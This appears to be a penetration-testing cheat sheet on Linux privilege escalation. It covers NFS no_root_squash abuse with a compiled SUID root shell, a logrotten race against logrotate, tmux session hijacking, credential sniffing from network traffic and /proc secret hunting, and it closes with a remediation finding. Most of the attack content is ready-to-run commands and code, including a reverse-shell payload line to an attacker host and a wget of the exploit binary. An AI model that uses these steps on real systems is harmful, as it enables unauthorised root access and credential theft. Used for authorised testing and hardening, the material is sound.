πŸ›‘οΈ Methodology Checklist

  • Check NFS exports: cat /etc/exports on the target, showmount -e from the attacker; look for no_root_squash
  • Mount the share on the attacker box as root, compile a static SUID C binary into it, chmod u+s
  • Execute the SUID binary on the target, via the exported path, to get a root shell
  • Check the logrotate version and find a rotated log whose directory you control and whose block uses the create directive
  • Use the logrotten tool to race logrotate for privilege escalation
  • Check tmux sockets: ls -al /tmp/tmux-*/ plus any -S socket path visible in ps output
  • If the socket is read/write for you: tmux -S [SOCKET] attach

🎯 Operational Context

Use when: NFS shares are found with no_root_squash, or logrotate runs as root against a log in a directory you control. These are specific, low-probability but high-value privesc paths. Think Dumber First: run showmount -e [TARGET] from the attack box; if a share is exported with no_root_squash, mount it as root on the attack box and create or modify files there as root. Logrotate: if you control the directory of a rotated log, or can inject into a logrotate config, use the logrotten exploit. Skip when: NFS is not reachable from your position and the logrotate configuration and log directories are root-only-writable.


⚡ Tactical Cheatsheet

Command                                     Tactical Outcome
cat /etc/exports                            Check the NFS export config on the target; look for no_root_squash
showmount -e [TARGET_IP]                    List NFS exports from the attacker machine
mount -t nfs [TARGET_IP]:/share /mnt/nfs    Mount the NFS share on the attacker machine (as root)
gcc shell.c -o shell -static                Compile the SUID payload statically on the attacker box (no libc mismatch on the target)
chmod +s /mnt/nfs/shell                     Set the SUID/SGID bits on the NFS-mounted file (preserved because of no_root_squash)
[EXPORTED_PATH]/shell                       Execute the SUID binary on the target, from the exported directory, for a root shell
logrotate --version                         Check the logrotate version (3.8.6/3.11.0/3.15.0/3.18.0 are the versions logrotten lists as affected)
ps aux | grep tmux                          Find existing tmux servers, especially root-owned ones, and any -S socket path
ls -la /tmp/ | grep tmux                    Find tmux socket directories in /tmp (default /tmp/tmux-[UID]/)
tmux -S /tmp/[SOCKET] attach                Attach to an existing session through its socket (needs read/write on the socket file)
tcpdump -i [IFACE] -w /tmp/capture.pcap     Capture traffic to a file
./PCredz -f /tmp/capture.pcap               Extract credentials from the pcap
./PCredz -i [IFACE]                         Live credential extraction from a network interface
net-creds.py -i [IFACE]                     Python alternative to PCredz for live capture

🔬 Deep Dive & Workflow

NFS no_root_squash Exploitation

# Target: check exports
cat /etc/exports
# → /var/nfs/general *(rw,no_root_squash)
# no_root_squash = remote root treated as local root (NOT squashed to nobody)
# also confirm the exported path is not on a nosuid mount on the target,
# otherwise the SUID bit is ignored when you execute the binary:
mount | grep /var/nfs
 
# On attacker machine (as root):
showmount -e [TARGET_IP]
mkdir /mnt/nfs
mount -t nfs [TARGET_IP]:/var/nfs/general /mnt/nfs
 
# Compile SUID shell (static, so the attacker's libc need not match the target's)
cat > /tmp/shell.c << 'EOF'
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(void) {
    /* drop to uid/gid 0 for real, then spawn a shell that keeps them (-p) */
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc /tmp/shell.c -o /mnt/nfs/shell -static
chmod +s /mnt/nfs/shell
# → attacker is root, so the file lands on the export owned by uid 0 with SUID/SGID set
 
# On target machine:
ls -la /var/nfs/general/shell   # → -rwsr-sr-x root root
/var/nfs/general/shell          # → root shell

Why it works: no_root_squash preserves the remote root UID (0). Files created or chmod'd by the attacker's root land with uid=0 and the SUID bit intact, and the target executes them from its local filesystem, so the only thing that stops the escalation is a nosuid mount option on that filesystem.

Unmount after: umount /mnt/nfs
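The exports check above is normally done by eye. The helper below is an added example, not part of the original page: it parses an exports(5) file and prints every path/client pair exported with no_root_squash, handling comments, several clients on one line, and clients with no option list (which default to root_squash). The exports file it runs on in the demo is constructed for this example.

```sh
#!/bin/sh
# Added example: parse an exports(5) file and print "path client" for every
# client spec whose option list contains no_root_squash.
# Clients with no "(options)" default to root_squash and are not reported.

nfs_weak_exports() {
    exports_file="${1:-/etc/exports}"
    # Subshell with globbing off: exports use "*" as a client wildcard and an
    # unquoted "*" would otherwise expand to file names in the current dir.
    (
        set -f
        sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$exports_file" |
        while read -r path clients; do
            for spec in $clients; do
                case "$spec" in
                    *"("*no_root_squash*")"*)
                        # strip "(options)" to leave only the client part
                        printf '%s %s\n' "$path" "${spec%%\(*}"
                        ;;
                esac
            done
        done
    )
}

# Demo on a constructed exports file (not taken from any real host).
demo_nfs_weak_exports() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
# constructed sample
/var/nfs/general *(rw,no_root_squash)
/srv/backup 10.0.0.0/24(rw,sync,no_root_squash) 192.168.1.5(ro)
/home 192.168.1.0/24(rw,sync)
/opt/data *(ro,no_root_squash,insecure)
EOF
    nfs_weak_exports "$tmp"
    rm -f "$tmp"
}

demo_nfs_weak_exports
```

Run it with no argument on a target to read /etc/exports directly; the same function is a quick defensive audit when run over a fleet's exports files. It only reads the config: whether a listed client is reachable, and whether the exported path sits on a nosuid mount, still has to be checked as described above.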

Logrotate Exploitation (logrotten)

# Verify the logrotate version
logrotate --version
# logrotten lists 3.8.6, 3.11.0, 3.15.0 and 3.18.0 as affected
 
# Find a log that logrotate (running as root) rotates from a directory you control
cat /etc/logrotate.conf
ls /etc/logrotate.d/
cat /etc/logrotate.d/*
 
# Requires: "create" directive for that log (in its block or at top level) + control of the
# directory holding the log: logrotten renames that directory and replaces it with a symlink,
# so write access to the log file alone is not enough
 
# On attacker: get logrotten
git clone https://github.com/whotwagner/logrotten
cd logrotten && gcc -o logrotten logrotten.c
 
# Transfer to target
wget http://[LHOST]/logrotten -O /tmp/logrotten
chmod +x /tmp/logrotten
 
# Payload: logrotten drops it as a file in /etc/bash_completion.d/ (its default target
# directory), so it runs the next time root starts an interactive bash with bash-completion
# enabled. Start your listener before the trigger.
echo "bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" > /tmp/payload
 
# Start logrotten first: it waits (inotify) for logrotate to move the old log away
/tmp/logrotten -p /tmp/payload /var/log/[LOGFILE] &
 
# Then make rotation happen: appending only helps if the block rotates on size;
# otherwise wait for the daily cron/timer run (or logrotate -f if you can run it)
echo "trigger" >> /var/log/[LOGFILE]
# → race: when logrotate renames the old log, logrotten swaps the log's directory for a
#   symlink to /etc/bash_completion.d, so the "new" log file is created there and filled with
#   the payload
# → root sources it at its next interactive bash start → code exec as root
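The "find a writable log in a logrotate config" step above is the part that takes time by hand. The helper below is an added example, not part of the original page and not part of logrotten: it walks logrotate config files, collects the log paths of each block together with whether that block (or a top-level directive) uses create, and prints the candidates whose directory the current user can write to. The config it parses in the demo is constructed.

```sh
#!/bin/sh
# Added example: list log paths from logrotate config blocks whose directory
# the current user can write to, tagged with whether the block uses "create"
# (a top-level "create" in logrotate.conf applies to every block).

logrotate_weak_targets() {
    [ $# -gt 0 ] || set -- /etc/logrotate.conf /etc/logrotate.d/*
    awk '
        /^[[:space:]]*#/ { next }
        # "path [path ...] {" opens a block; paths may also sit on earlier lines
        /\{/ {
            inblock = 1; has_create = global_create
            sub(/\{.*/, "")
            for (i = 1; i <= NF; i++) if ($i ~ /^\//) paths[np++] = $i
            next
        }
        inblock && $1 == "create"   { has_create = 1; next }
        inblock && $1 == "nocreate" { has_create = 0; next }
        /\}/ {
            mode = has_create ? "create" : "nocreate"
            for (i = 0; i < np; i++) print mode, paths[i]
            np = 0; inblock = 0; next
        }
        !inblock && $1 == "create"   { global_create = 1; next }
        !inblock && $1 == "nocreate" { global_create = 0; next }
        !inblock && $1 ~ /^\// { for (i = 1; i <= NF; i++) if ($i ~ /^\//) paths[np++] = $i }
    ' "$@" 2>/dev/null |
    while read -r mode logpath; do
        # dirname works on globs too: /var/log/app/*.log -> /var/log/app
        dir=$(dirname "$logpath")
        if [ -w "$dir" ]; then
            printf '%s %s\n' "$mode" "$logpath"
        fi
    done
}

# Demo on a constructed config (not from any real host). The temp path is
# replaced by BASE so the output is stable.
demo_logrotate_targets() {
    base=$(mktemp -d)
    mkdir -p "$base/app" "$base/noc"
    cat > "$base/demo.conf" <<EOF
# constructed sample config
$base/app/*.log $base/app/error.log {
    daily
    rotate 7
    create 0644 www-data www-data
    postrotate
        /bin/true
    endscript
}
/nonexistent-dir-for-demo/other.log {
    create
}
$base/noc/audit.log {
    weekly
    nocreate
}
EOF
    logrotate_weak_targets "$base/demo.conf" | sed "s|$base|BASE|"
    rm -rf "$base"
}

demo_logrotate_targets
```

Treat "create" hits as candidates, not confirmed wins: logrotten renames the log's directory, which additionally needs write access to that directory's parent, and a "nocreate" hit is only useful if a top-level create you did not pass in applies. Pass /etc/logrotate.conf first so the global create/nocreate state is picked up before the included files.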

tmux Session Hijacking

# Find root-owned tmux servers and their socket paths
ps aux | grep tmux
# → root ... tmux new-session -s root -d      (default socket: /tmp/tmux-0/default)
# → or: tmux -S /tmp/sharesocket ...          (explicit socket path)
 
find /tmp -name "*tmux*" 2>/dev/null
ls -la /tmp/ | grep tmux
ls -la /tmp/tmux-*/                           # expect srw-rw---- on the socket file
 
# Attach to the socket (you need read/write on the socket file)
tmux -S /tmp/tmux-0/default attach
# or through the TMUX environment variable (socket path,pid,session index)
TMUX=/tmp/tmux-1000/default,0,0 tmux attach
 
# If the socket is group read/write and you are in that group:
tmux -S [SOCKET_PATH] attach
# → full interactive session as the user who started the server (root if root did)

Network Traffic Credential Capture

# Passive capture to file
tcpdump -i [IFACE] -w /tmp/capture.pcap
# Let run for a few minutes, then CTRL+C
 
# Extract credentials from capture
./PCredz -f /tmp/capture.pcap
# Finds: HTTP Basic auth, FTP, SMTP, POP3, IMAP, SNMP, NTLMv1/v2, Kerberos
 
# Live credential extraction (requires root or cap_net_raw)
./PCredz -i eth0
 
# Alternative
python3 net-creds.py -p /tmp/capture.pcap
 
# What to look for:
# - Cleartext passwords (FTP, HTTP Basic, Telnet, POP3/IMAP/SMTP without TLS)
# - NetNTLM hashes → crack with hashcat -m 5600 (NTLMv2) or -m 5500 (NTLMv1)
# - HTTP POST bodies with password= parameters

Service Internals Enumeration

# Find interesting internal processes (kernel threads show as [name] and are skipped)
ps aux | grep -v "\[" | awk '{print $11}' | sort -u
 
# Trace system calls on a running process (needs ptrace rights: same uid with
# kernel.yama.ptrace_scope = 0, or root)
strace -p [PID] -s 256 2>&1 | grep -i "open\|read\|pass"
 
# Trace library calls
ltrace [BINARY] 2>&1 | grep -i "pass\|cred\|auth"
 
# Check /proc for process cmdline (may contain passwords). Arguments are NUL-separated,
# so strings (or tr) is needed to get greppable text; environ is readable only for
# processes you own
find /proc -name cmdline 2>/dev/null | xargs strings 2>/dev/null | grep -i pass
for p in /proc/[0-9]*; do tr '\0' ' ' < $p/cmdline 2>/dev/null | grep -i pass && echo "  ^ $p"; done
tr '\0' '\n' < /proc/[PID]/environ 2>/dev/null | grep -i pass
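/proc/<pid>/cmdline separates arguments with NUL bytes, so a plain grep over it cannot tell where one argument ends. The helper below is an added example, not part of the original page: it walks a /proc-style tree, matches each argument on its own against password-style flags and key=value secrets, and prints the pid with the joined command line. The proc root is a parameter so the demo can run on a constructed fake tree; on a real host call it without arguments.

```sh
#!/bin/sh
# Added example: find secrets passed on process command lines.
# $1 is the proc root (default /proc) so the demo can use a constructed tree.

proc_cmdline_secrets() {
    procroot="${1:-/proc}"
    for f in "$procroot"/[0-9]*/cmdline; do
        [ -r "$f" ] || continue
        pid=${f#"$procroot"/}; pid=${pid%/cmdline}
        cmd=$(tr '\0' ' ' < "$f" 2>/dev/null)   # NUL -> space for display
        cmd=${cmd% }
        [ -n "$cmd" ] || continue                # kernel threads: empty cmdline
        # Examine each argument on its own so -p/--password style flags are
        # matched as whole words. "-p?*" is deliberately loose (mysql -pSecret)
        # and also hits things like "-print": review the output by hand.
        tr '\0' '\n' < "$f" | while read -r arg; do
            case "$arg" in
                --password=*|--password|-p?*|*[Pp]ass=*|*[Pp]asswd=*|*secret=*|*[Tt]oken=*|*api[_-]key=*)
                    printf '%s %s\n' "$pid" "$cmd"
                    break
                    ;;
            esac
        done
    done
}

# Demo on a constructed /proc-like tree; the cmdline files are NUL-separated
# exactly as the kernel writes them.
demo_proc_cmdline_secrets() {
    root=$(mktemp -d)
    mkdir -p "$root/101" "$root/202" "$root/303"
    printf 'mysql\000-u\000root\000-pS3cretPw\000appdb\000' > "$root/101/cmdline"
    printf '/usr/bin/python3\000/opt/app/worker.py\000--api_key=abc123\000' > "$root/202/cmdline"
    printf 'sshd:\000/usr/sbin/sshd\000-D\000' > "$root/303/cmdline"
    proc_cmdline_secrets "$root"
    rm -rf "$root"
}

demo_proc_cmdline_secrets
```

The same loop works on environ files (swap cmdline for environ), but those are only readable for processes running as your own uid unless you are root.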

πŸ› οΈ Troubleshooting & Edge Cases

Problem: NFS mount fails
Cause: RPC/NFS ports blocked or nfs-common not installed
Fix: apt install nfs-common; check ports: nmap -p 111,2049 [TARGET] (add -sU for the UDP side)

Problem: NFS mounted but no_root_squash not set
Cause: Root squashing enabled (the default)
Fix: Files you create land as nobody:nogroup and cannot be made SUID root; look for other exports that do carry no_root_squash

Problem: Logrotten exploit fails
Cause: Unaffected logrotate version, no create directive for that log, or the log's directory is not under your control
Fix: Compare logrotate --version with the versions listed above (3.8.6, 3.11.0, 3.15.0, 3.18.0); confirm the block (or the top-level config) has create and that you can rename the directory holding the log, not just write the file

Problem: NFS write blocked despite no_root_squash
Cause: Directory permissions on the exported path, or the export is rw only for specific client addresses
Fix: As root on the attack box, create the file and chown it to the target user, or place the SUID binary in a subdirectory you can write to; check the client list in showmount -e

Problem: SUID binary runs on the target but gives no root
Cause: The exported path is on a filesystem the target mounts with nosuid, or the SUID bit did not survive (ls -la should show rws)
Fix: On the target, mount | grep [EXPORTED_PATH]; pick an export on a filesystem without nosuid, or use the root-level write to modify a privileged file instead (cron entry, sudoers drop-in, authorized_keys)

Problem: Logrotate privesc path not writable
Cause: Config in /etc/logrotate.d/ requires root
Fix: Look for app-specific logrotate configs and log directories in writable locations such as /opt or /var/app/

πŸ“ Reporting Trigger

Finding Title: NFS no_root_squash Misconfiguration Enables Privilege Escalation

Impact: An NFS share exported with no_root_squash lets an attacker who can reach the NFS server mount the share as root from their own system and place SUID binaries or modify privileged files on it, achieving root on the target system.

Root Cause: NFS export configured with the no_root_squash option, which disables the mapping of remote root to an unprivileged user for that export.

Recommendation: Enable root_squash on all NFS exports (the default behaviour). Restrict each export to the authorised client addresses instead of *. If NFS must remain, prefer NFSv4 with Kerberos (sec=krb5 or krb5p) over AUTH_SYS so that client-asserted UIDs are no longer trusted. Audit all NFS exports for security misconfigurations.